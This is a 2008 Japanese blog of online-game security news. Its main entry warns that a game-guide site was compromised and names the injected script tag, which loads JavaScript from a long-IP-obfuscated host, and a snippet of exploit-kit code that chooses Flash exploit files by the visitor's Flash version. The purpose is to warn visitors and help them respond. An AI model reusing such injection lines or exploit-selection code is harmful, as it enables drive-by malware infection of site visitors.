2008年10月 8日
キャラクター誘拐殺人事件[ 情報・ニュース等 ]
また不正アクセスの事件です。
ネット“誘拐事件”発生…オンラインゲームキャラ奪う(ZAKZAK)
記事では面白可笑しく書かれていますが、内容はごく普通に
不正アクセスによりキャラクターが消される等した事件です。
何度も同じような事件が起こっているのに無くなりませんねぇ。
2008年10月 2日
ブリザード World of Warcraft(WoW) BOTとの訴訟に勝利[ 情報・ニュース等 , 海外ゲーム情報 ]
ブリザードが自動狩りプログラム(BOT)開発会社に強力に対応、
大々的な勝利を納めた。
去る 7月、訴訟に入った 「MMOグライダー」 というBOTプログラムに対して
アメリカ合衆国アリゾナ地方法院のデビットキャンベル判事は、
「MMOグライダー」がWOWの約款を破ったとし、それによる損害賠償として
ブリザードに 6百万ドル(約6億3千万円)を支払う事を宣告した。
(gamespot)
続きを読む...2008年9月28日
L2クエスト攻略が改ざんされているかもしれない件[ 情報・ニュース等 ]
修正された様です。
2008年9月27日夜より9月29日早朝までの間、リンクファイルが改竄され、
ウイルスファイルへの直リンクがソースに埋め込まれました。
ウイルス内容と対応については現在調査中です。
-----
カイン掲示板にてL2クエスト攻略が改ざんされているかもしれないと
記載があります。
調べてみた所、確かに
script src=http://1039045726:65535/jp.jsという記述が存在しています。
この1039045726という数字は一見URLでは無さそうですが、
ロングIPアドレスというもので、URLを10桁の数字に置き換えたものです。
このロングIPアドレスをデコードしてみると、以下の結果が出ました。
IPアドレス 61.238.148.94
ホスト名 061238148094.ctinets.com
IPアドレス割当国 香港 ( hk )
明らかに怪しいです。
飛び先のjp.jsファイルをソースチェッカーにて確認してみると、
さらに同じサーバーの別ファイルに飛び、もう一度別ファイルに
飛んだ後、いくつかのFlashファイルにリンクされています。
if(v1 != 9) return ;
if(v3 == 115) vuln ="ia115-2.swf";
else if(v3 == 64) vuln="ia64-2.swf";
else if(v3 == 47) vuln="ia47-2.swf";
else if(v3 == 45) vuln="ia45-2.swf";
else if(v3 == 28)vuln="ia28-2.swf";
else if(v3 == 16) vuln ="ia16-2.swf";
else if(v3 == 0) vuln="ia00-2.swf";
else return ;
これから判断するに、Flashの脆弱性を狙った
アカウントハックウイルスだと思われます。
何時から埋め込まれていたのかは定かではありませんが、
L2攻略のリンクバーに埋め込まれているので、
リンクが表示されている所にアクセスした方は
ウイルスに感染している可能性があります。
ここ数日でL2クエスト攻略を訪れた形跡のある方は、
各社オンラインスキャンを通してチェックする事をオススメします。
オンラインスキャンサイトの一覧 - ウイルス、スパイウェア検出
http://cowscorpion.com/Outline/secu_on.html
2008年9月21日
オンラインゲームに潜む影(後編) ハック後の対処方法[ 情報・ニュース等 ]
ITMediaのアカウントハックについて記事、後編です。
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(後編)(ITMedia)
後編は実際にアカウントハックされたらどうするかをテーマに
記事が記載されています。
関連記事:オンラインゲームに潜む影(前編) アカウントハックの恐怖と内容
2008年9月19日
オンラインゲームに潜む影(前編) アカウントハックの恐怖と内容[ 情報・ニュース等 ]
ITMediaがアカウントハックについて記事を書いています。
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(前編) (ITmedia)
記事の内容は、どんな方法でアカウント、パスワードが盗まれるか。
これを機会にPCのセキュリティやパスワードなどの管理方法を
再確認して置くと良いでしょう。